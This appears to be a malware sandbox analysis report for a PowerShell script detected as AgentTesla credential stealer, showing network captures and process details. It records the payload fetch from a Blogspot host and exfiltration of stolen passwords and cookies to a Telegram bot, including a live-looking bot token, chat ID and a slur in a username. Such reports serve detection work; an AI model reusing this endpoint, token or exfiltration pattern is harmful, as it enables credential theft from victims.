Apr 25, 2024 19:01:23.732165098 CEST	176	OUT	GET /haha HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: minecap4-22-24.blogspot.com Connection: Keep-Alive
Apr 25, 2024 19:01:23.887087107 CEST	722	IN	HTTP/1.1 301 Moved Permanently Location: https://minecap4-22-24.blogspot.com/haha Content-Type: text/html; charset=UTF-8 Date: Thu, 25 Apr 2024 17:01:23 GMT Expires: Thu, 25 Apr 2024 17:01:23 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN Content-Security-Policy: frame-ancestors 'self' X-XSS-Protection: 1; mode=block Server: GSE Accept-Ranges: none Vary: Accept-Encoding Transfer-Encoding: chunked Data Raw: 66 39 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 21 2d 2d 20 47 53 45 20 44 65 66 61 75 6c 74 20 45 72 72 6f 72 20 2d 2d 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 6d 69 6e 65 63 61 70 34 2d 32 32 2d 32 34 2e 62 6c 6f 67 73 70 6f 74 2e 63 6f 6d 2f 68 61 68 61 22 3e 68 65 72 65 3c 2f 41 3e 2e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0d 0a Data Ascii: f9<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000">... GSE Default Error --><H1>Moved Permanently</H1>The document has moved <A HREF="https://minecap4-22-24.blogspot.com/haha">here</A>.</BODY></HTML>
Apr 25, 2024 19:01:23.887149096 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49719	208.95.112.1	80	6096	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 19:01:25.232599974 CEST	80	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Apr 25, 2024 19:01:25.357310057 CEST	174	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 17:01:24 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 5 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 74 72 75 65 0a Data Ascii: true

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49738	142.251.15.132	80	7876	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 19:01:41.157087088 CEST	176	OUT	GET /haha HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: minecap4-22-24.blogspot.com Connection: Keep-Alive
Apr 25, 2024 19:01:41.287103891 CEST	722	IN	HTTP/1.1 301 Moved Permanently Location: https://minecap4-22-24.blogspot.com/haha Content-Type: text/html; charset=UTF-8 Date: Thu, 25 Apr 2024 17:01:41 GMT Expires: Thu, 25 Apr 2024 17:01:41 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN Content-Security-Policy: frame-ancestors 'self' X-XSS-Protection: 1; mode=block Server: GSE Accept-Ranges: none Vary: Accept-Encoding Transfer-Encoding: chunked Data Raw: 66 39 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 21 2d 2d 20 47 53 45 20 44 65 66 61 75 6c 74 20 45 72 72 6f 72 20 2d 2d 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 6d 69 6e 65 63 61 70 34 2d 32 32 2d 32 34 2e 62 6c 6f 67 73 70 6f 74 2e 63 6f 6d 2f 68 61 68 61 22 3e 68 65 72 65 3c 2f 41 3e 2e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0d 0a Data Ascii: f9<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000">... GSE Default Error --><H1>Moved Permanently</H1>The document has moved <A HREF="https://minecap4-22-24.blogspot.com/haha">here</A>.</BODY></HTML>
Apr 25, 2024 19:01:41.287133932 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49712	172.67.74.152	443	6096	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-25 17:01:21 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-04-25 17:01:24 UTC	211	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 17:01:24 GMT Content-Type: text/plain Content-Length: 14 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 879fe500fc5f1d68-ATL
2024-04-25 17:01:24 UTC	14	IN	Data Raw: 31 38 35 2e 31 35 32 2e 36 36 2e 32 33 30 Data Ascii: 185.152.66.230

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49717	142.251.15.132	443	7196	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-25 17:01:24 UTC	176	OUT	GET /haha HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: minecap4-22-24.blogspot.com Connection: Keep-Alive
2024-04-25 17:01:24 UTC	434	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=UTF-8 Location: /atom.xml Date: Thu, 25 Apr 2024 17:01:24 GMT Expires: Thu, 25 Apr 2024 17:01:24 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-04-25 17:01:24 UTC	224	IN	Data Raw: 64 61 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 21 2d 2d 20 47 53 45 20 44 65 66 61 75 6c 74 20 45 72 72 6f 72 20 2d 2d 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 2f 61 74 6f 6d 2e 78 6d 6c 22 3e 68 65 72 65 3c 2f 41 3e 2e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0d 0a Data Ascii: da<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000">... GSE Default Error --><H1>Moved Permanently</H1>The document has moved <A HREF="/atom.xml">here</A>.</BODY></HTML>
2024-04-25 17:01:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49718	142.251.15.132	443	7196	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-25 17:01:24 UTC	156	OUT	GET /atom.xml HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: minecap4-22-24.blogspot.com
2024-04-25 17:01:24 UTC	562	IN	HTTP/1.1 200 OK Cross-Origin-Resource-Policy: cross-origin Date: Thu, 25 Apr 2024 17:01:24 GMT Content-Type: application/atom+xml; charset=UTF-8 Server: blogger-renderd Cache-Control: public, must-revalidate, proxy-revalidate, max-age=1 Vary: Accept-Encoding Expires: Thu, 25 Apr 2024 17:01:25 GMT X-Content-Type-Options: nosniff X-XSS-Protection: 0 Last-Modified: Mon, 22 Apr 2024 17:27:39 GMT X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Connection: close Transfer-Encoding: chunked
2024-04-25 17:01:24 UTC	693	IN	Data Raw: 35 61 31 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 3f 78 6d 6c 2d 73 74 79 6c 65 73 68 65 65 74 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 62 6c 6f 67 67 65 72 2e 63 6f 6d 2f 73 74 79 6c 65 73 2f 61 74 6f 6d 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3f 3e 3c 66 65 65 64 20 78 6d 6c 6e 73 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 35 2f 41 74 6f 6d 27 20 78 6d 6c 6e 73 3a 6f 70 65 6e 53 65 61 72 63 68 3d 27 68 74 74 70 3a 2f 2f 61 39 2e 63 6f 6d 2f 2d 2f 73 70 65 63 2f 6f 70 65 6e 73 65 61 72 63 68 72 73 73 2f 31 2e 30 2f 27 20 78 6d 6c 6e 73 3a 62 6c 6f 67 67 65 72 3d 27 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 67 Data Ascii: 5a1<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:blogger='http://schemas.g
2024-04-25 17:01:24 UTC	755	IN	Data Raw: 63 61 70 34 2d 32 32 2d 32 34 2e 62 6c 6f 67 73 70 6f 74 2e 63 6f 6d 2f 66 65 65 64 73 2f 70 6f 73 74 73 2f 64 65 66 61 75 6c 74 27 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 65 6c 66 27 20 74 79 70 65 3d 27 61 70 70 6c 69 63 61 74 69 6f 6e 2f 61 74 6f 6d 2b 78 6d 6c 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 6c 6f 67 67 65 72 2e 63 6f 6d 2f 66 65 65 64 73 2f 33 34 30 38 34 33 37 37 30 35 34 39 33 33 38 34 33 37 38 2f 70 6f 73 74 73 2f 64 65 66 61 75 6c 74 3f 61 6c 74 3d 61 74 6f 6d 27 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 27 61 6c 74 65 72 6e 61 74 65 27 20 74 79 70 65 3d 27 74 65 78 74 2f 68 74 6d 6c 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 6d 69 6e 65 63 61 70 34 2d 32 32 2d 32 34 2e 62 6c 6f 67 73 70 6f 74 2e 63 6f 6d 2f 27 2f Data Ascii: cap4-22-24.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/3408437705493384378/posts/default?alt=atom'/><link rel='alternate' type='text/html' href='https://minecap4-22-24.blogspot.com/'/
2024-04-25 17:01:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49720	149.154.167.220	443	6096	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-25 17:01:26 UTC	260	OUT	POST /bot6350883303:AAHET8Logo726LGRK7Ge4TmyyoY2y3wAp0I/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dc6566aab26a81 Host: api.telegram.org Content-Length: 975 Expect: 100-continue Connection: Keep-Alive
2024-04-25 17:01:27 UTC	975	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 35 36 36 61 61 62 32 36 61 38 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 36 34 34 34 39 36 39 38 36 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 35 36 36 61 61 62 32 36 61 38 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 34 2f 32 35 2f 32 30 32 34 20 32 30 3a 33 31 3a 32 30 0a 55 73 65 72 Data Ascii: -----------------------------8dc6566aab26a81Content-Disposition: form-data; name="chat_id"6444969864-----------------------------8dc6566aab26a81Content-Disposition: form-data; name="caption"New PW Recovered!Time: 04/25/2024 20:31:20User
2024-04-25 17:01:27 UTC	25	IN	HTTP/1.1 100 Continue
2024-04-25 17:01:27 UTC	1153	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Thu, 25 Apr 2024 17:01:27 GMT Content-Type: application/json Content-Length: 765 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":275,"from":{"id":6350883303,"is_bot":true,"first_name":"CPA_APRIL_24_bot","username":"CPA_APRIL_24_bot"},"chat":{"id":6444969864,"first_name":"Duke","last_name":"Habibi","username":"niggaman007","type":"private"},"date":1714064487,"document":{"file_name":"user-226546 2024-04-25 20-31-20.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIBE2YqjGemz1DFVlIUl8s_IMB61FDWAALqFQACCn1YUS920hhefEzxNAQ","file_unique_id":"AgAD6hUAAgp9WFE","file_size":350},"caption":"New PW Recovered!\n\nTime: 04/25/2024 20:31:20\nUser Name: user/226546\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 185.152.66.230","caption_entities":[{"offset":179,"length":14,"type":"url"}]}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49721	149.154.167.220	443	6096	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-25 17:01:27 UTC	236	OUT	POST /bot6350883303:AAHET8Logo726LGRK7Ge4TmyyoY2y3wAp0I/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dc6578c6979a5e Host: api.telegram.org Content-Length: 914 Expect: 100-continue
2024-04-25 17:01:28 UTC	914	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 35 37 38 63 36 39 37 39 61 35 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 36 34 34 34 39 36 39 38 36 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 35 37 38 63 36 39 37 39 61 35 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 43 4f 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 34 2f 32 35 2f 32 30 32 34 20 32 32 3a 34 30 3a 35 38 0a 55 73 65 72 Data Ascii: -----------------------------8dc6578c6979a5eContent-Disposition: form-data; name="chat_id"6444969864-----------------------------8dc6578c6979a5eContent-Disposition: form-data; name="caption"New CO Recovered!Time: 04/25/2024 22:40:58User
2024-04-25 17:01:28 UTC	25	IN	HTTP/1.1 100 Continue
2024-04-25 17:01:28 UTC	1153	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Thu, 25 Apr 2024 17:01:28 GMT Content-Type: application/json Content-Length: 765 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":276,"from":{"id":6350883303,"is_bot":true,"first_name":"CPA_APRIL_24_bot","username":"CPA_APRIL_24_bot"},"chat":{"id":6444969864,"first_name":"Duke","last_name":"Habibi","username":"niggaman007","type":"private"},"date":1714064488,"document":{"file_name":"user-226546 2024-04-25 22-40-58.txt","mime_type":"text/plain","file_id":"BQACAgQAAxkDAAIBFGYqjGgM9NOQ80v4zUnlSoi8AwqGAALrFQACCn1YUdgK5qAuBMy4NAQ","file_unique_id":"AgAD6xUAAgp9WFE","file_size":289},"caption":"New CO Recovered!\n\nTime: 04/25/2024 22:40:58\nUser Name: user/226546\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 185.152.66.230","caption_entities":[{"offset":179,"length":14,"type":"url"}]}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49739	142.251.15.132	443	7876	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-25 17:01:41 UTC	176	OUT	GET /haha HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: minecap4-22-24.blogspot.com Connection: Keep-Alive
2024-04-25 17:01:41 UTC	434	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=UTF-8 Location: /atom.xml Date: Thu, 25 Apr 2024 17:01:41 GMT Expires: Thu, 25 Apr 2024 17:01:41 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-04-25 17:01:41 UTC	224	IN	Data Raw: 64 61 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 21 2d 2d 20 47 53 45 20 44 65 66 61 75 6c 74 20 45 72 72 6f 72 20 2d 2d 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 2f 61 74 6f 6d 2e 78 6d 6c 22 3e 68 65 72 65 3c 2f 41 3e 2e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0d 0a Data Ascii: da<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000">... GSE Default Error --><H1>Moved Permanently</H1>The document has moved <A HREF="/atom.xml">here</A>.</BODY></HTML>
2024-04-25 17:01:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49740	142.251.15.132	443	7876	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-25 17:01:42 UTC	156	OUT	GET /atom.xml HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: minecap4-22-24.blogspot.com
2024-04-25 17:01:42 UTC	570	IN	HTTP/1.1 200 OK Cross-Origin-Resource-Policy: cross-origin Server: blogger-renderd X-Content-Type-Options: nosniff X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Date: Thu, 25 Apr 2024 17:01:42 GMT Expires: Thu, 25 Apr 2024 17:01:43 GMT Cache-Control: public, must-revalidate, proxy-revalidate, max-age=1 Last-Modified: Mon, 22 Apr 2024 17:27:39 GMT Content-Type: application/atom+xml; charset=UTF-8 Vary: Accept-Encoding Age: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Connection: close Transfer-Encoding: chunked
2024-04-25 17:01:42 UTC	685	IN	Data Raw: 35 61 31 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 3f 78 6d 6c 2d 73 74 79 6c 65 73 68 65 65 74 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 62 6c 6f 67 67 65 72 2e 63 6f 6d 2f 73 74 79 6c 65 73 2f 61 74 6f 6d 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3f 3e 3c 66 65 65 64 20 78 6d 6c 6e 73 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 35 2f 41 74 6f 6d 27 20 78 6d 6c 6e 73 3a 6f 70 65 6e 53 65 61 72 63 68 3d 27 68 74 74 70 3a 2f 2f 61 39 2e 63 6f 6d 2f 2d 2f 73 70 65 63 2f 6f 70 65 6e 73 65 61 72 63 68 72 73 73 2f 31 2e 30 2f 27 20 78 6d 6c 6e 73 3a 62 6c 6f 67 67 65 72 3d 27 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 67 Data Ascii: 5a1<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:blogger='http://schemas.g
2024-04-25 17:01:42 UTC	768	IN	Data Raw: 73 3a 2f 2f 6d 69 6e 65 63 61 70 34 2d 32 32 2d 32 34 2e 62 6c 6f 67 73 70 6f 74 2e 63 6f 6d 2f 66 65 65 64 73 2f 70 6f 73 74 73 2f 64 65 66 61 75 6c 74 27 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 65 6c 66 27 20 74 79 70 65 3d 27 61 70 70 6c 69 63 61 74 69 6f 6e 2f 61 74 6f 6d 2b 78 6d 6c 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 6c 6f 67 67 65 72 2e 63 6f 6d 2f 66 65 65 64 73 2f 33 34 30 38 34 33 37 37 30 35 34 39 33 33 38 34 33 37 38 2f 70 6f 73 74 73 2f 64 65 66 61 75 6c 74 3f 61 6c 74 3d 61 74 6f 6d 27 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 27 61 6c 74 65 72 6e 61 74 65 27 20 74 79 70 65 3d 27 74 65 78 74 2f 68 74 6d 6c 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 6d 69 6e 65 63 61 70 34 2d 32 32 2d 32 34 2e 62 6c 6f 67 73 70 6f Data Ascii: s://minecap4-22-24.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/3408437705493384378/posts/default?alt=atom'/><link rel='alternate' type='text/html' href='https://minecap4-22-24.blogspo

Target ID:	0
Start time:	19:00:56
Start date:	25/04/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\o3KyzpE7F4.ps1"
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	19:00:56
Start date:	25/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	19:01:18
Start date:	25/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0xfe0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	19:01:18
Start date:	25/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0x370000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.3250437857.000000000286A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.3250437857.0000000002829000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.3250437857.0000000002829000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.3250437857.0000000002829000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.3250437857.000000000287A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.3250437857.000000000287A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
